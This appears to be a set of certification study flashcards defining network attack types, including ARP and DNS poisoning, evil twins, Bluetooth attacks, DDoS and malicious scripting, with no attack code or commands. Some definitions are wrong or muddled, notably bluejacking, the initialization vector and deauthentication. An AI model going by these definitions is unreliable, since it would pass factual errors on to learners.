1.4 Given a scenario, analyze potential indicators associated with network attacks
Address Resolution Protocol (ARP) poisoning
ARP operates at Layer 2 of the OSI model and operates using Media Access Control (MAC) addresses ARP attacks must be done locally and can redirect you to another website similar to DNA poisoning. The best way to prevent ARP poisoning is to use arp -s to insert static entries into the ARP cache. ARP broadcasting sends unsolicited ARP replies to the victim. ARP spoofing allows an attacker to intercept data frames on a network, modify traffic, or stop all traffic.
Bash (malicious code or script execution)
Bourne Again Shell In Linux, we use the Bash shell to run commands and run executables and automated tasks. Shellshock was a Bash shell vulnerability that allowed attackers to obtain remote access to many web servers
Domain Reputation
Companies have to be very careful with the reputation associated with their email and web services. Email reputation is determined on the type of email that is being sent from an organization and what the users are clicking in their mail clients. If many people start clicking that a particular type of email sent from a company is spam, that will affect the reputation and the ability for that company to send mail to others. A good example of this reputation problem is if a company might be infected with malware that sends spam using the company's email server. Users will receive that spam message and they will click that button inside of their mail client that says, "This is spam." As companies begin receiving more and more reports from their users that you're sending spam, they will start limiting or restricting your ability to send any emails to their users. There are many websites that can check and constantly monitor the reputation of your email IP address so that you can stop any of these problems before they become a significant issue. Not only do you have to be aware of the reputation of your email servers, you also have to be aware of the reputation of your web servers. If an attacker was to put malware onto a web server, that web server will be indexed by the major search engines and those search engines will identify the malware that's on your server. Then any time anyone visits your website, they will get a message that says the site ahead contains malware with a big red message warning them that the site they are visiting is not safe
jamming (wireless attacks)
This is a form of denial of service that specifically targets the radio spectrum aspect of wireless. Just as other DoS attacks can manipulate things behind the scenes, so can this on a wireless AP, enabling things such as attachment to a rogue AP.
MAC cloning
This is used when you want to pretend to be a different device, so you can connect to a network device or bypass the security on a captive portal
Macros (malicious code or script execution)
____ are disabled by default in Microsoft Office. These are a series of actions you want to carry out that are normally used with Word or Excel and they use Microsoft's Visual Basic for Applications scripting language Macros can be launched through phishing emails...beware of emails saying Confidential Information or for invoices for unknown purchases. a good anti-virus will prevent macros from running
disassociation (wireless attacks)
a type of DoS attack where the authentication frame is sent to the wireless user so that their connection to the WAP drops
Bluesnarfing (wireless attacks)
an attacker hijacks a Bluetooth phone but in this scenario they extract contact details and any sensitive information
PowerShell (malicious code or script execution)
can perform tasks in a Windows environment. PowerShell has many different modules that can be used for remote access as well as for use by attackers. These attacks have been on the increase. it has been used for the following attacks: - injecting malware directly into memory -used to run macros -lateral movement attacks
Operational technology (OT) (DDoS)
hardware or software that controls devices used in video surveillance in the past, these devices worked in an air-gapped environment as CCTV, but nowadays there are interconnected video surveillance solutions and these are now being targeted by a DDos attack so that they fail and leave a company vulnerable
On-path attack(previously known as man-in-the-middle attack/man-in-the-browser-attack)
interception attacks where the attacker places themselves between two entities, normally a web browser and a web server. they normally modify the communications to either collect information or impersonate the other entity man-in-the-middle attack (MITM) is where the attacker intercepts traffic going between two hosts and then changes the information in the packets real time ex. a hacker is imitating the conversations of two parties to gain access to funds. the attacker intercepts a public key and with that, can put in their own credentials to trick the people on both sides into believing that they are talking to each other in a secure environment man-in-the-browser attack is where a malicious plugin or script has been downloaded and the browser has been compromised. it acts like a trojan, meaning that when you next carry out online banking, it steals your online banking details
Near Field Communication (NFC) (wireless attacks)
normally used to make a wireless payment when the car must be within 4cm of the card reader. should store your NFC enabled card inside an aluminum pouch to prevent someone from standing close to you
Python (malicious code or script execution)
powerful scripting language used by administrators of websites and are vulnerable to backdoor attacks
DNS poisoning
putting bad entries into the DNS cache, diverting requests to a fraudulent website than has been made to look like the legitimate website
Initialization Vector (IV) (wireless attacks)
random value used as a secret key for data encryption. this number is called a nonce, is employed only one time in any session. the IV length is usually comparable to the length of the encryption key or the block of the cipher in use. sometimes this is also known as the starter variable
Visual Basic for Applications (VBA)
refers to a programming language you can use to create macros. It is a descendant of the BASIC programming language that is used in all Office products, as well as some other types of software.
Radio Frequency Identification (RFID)
uses radio frequency to identify electromagnetic fields in a tag to track assets. it is commonly used in shops as the tags are attached to high value assets to prevent theft. when the asset leaves the store, an alarm goes off
Domain Hijacking
when someone tries to change the domain registration of a domain with the internet authorities so that they can control it for profit for example, an attack manages to reregister the domain name of a well known company and can access the control panel with the original domain's company, Hosting A. Then they take out a hosting package with Hosting B, where they copy over all of the files from Hosting A and move them to Hosting B. They then point the DNS records to Hosting B, where they can take sales from customers who believe they are trading with the original company
Evil twin (wireless attacks)
when there is another WAP (wireless access point) that looks like the legitimate WAP but it has no security. this designed to lure you into using this WAP and is where your traffic will be captured
Network (DDoS)
where a botnet is set up to flood a victim's system with an enormous amount of traffic so that it is taken down if a stateful firewall were to be used to prevent a network DDoS attack, it would prevent the traffic from entering your network
rogue access point (wireless attacks)
where an additional access point is joined to your corporate network, yet again with no security, so as to lure users into connecting to it. this can be prevented by installing 802.1x-managed switches where all devices connecting to the network are authenticated
Media access control (MAC) flooding
where an attack floods a switch with Ethernet packers so that it consumes the limited memory that a switch has this can be prevented by using a n 802.1 x managed switch with an AAA server
Uniform Resource Locator (URL) redirection
where an attacker redirects you from a legitimate website to a fraudulent website. this can be done if you can hack the control panel for the domain. this can be prevented by keeping your software up to date, using a web application firewall or using an automated website scanner that will find vulnerabilities
bluejacking (wireless attacks)
where an attacker takes control of a Bluetooth device such as a phone and then are able to make phone calls and send text messages
Application (DDoS)
where the DDoS tries to flood a particular application and the number of packets is known as requests per second (rps). This is where specially crafted packets are sent to the application so that it cannot cope with the volume
DOS attack vs DDOS attack
where the victims machine or network is flooded with high volume requests from another host so that it is not available for any other hosts to use a common method is the SYN method where the first two parts of the three-way handshake occur and the victim holds a session waiting for an ACK that never comes A DoS network attack comes from a single IP address whereas a DDoS network attack comes from multiple IP addresses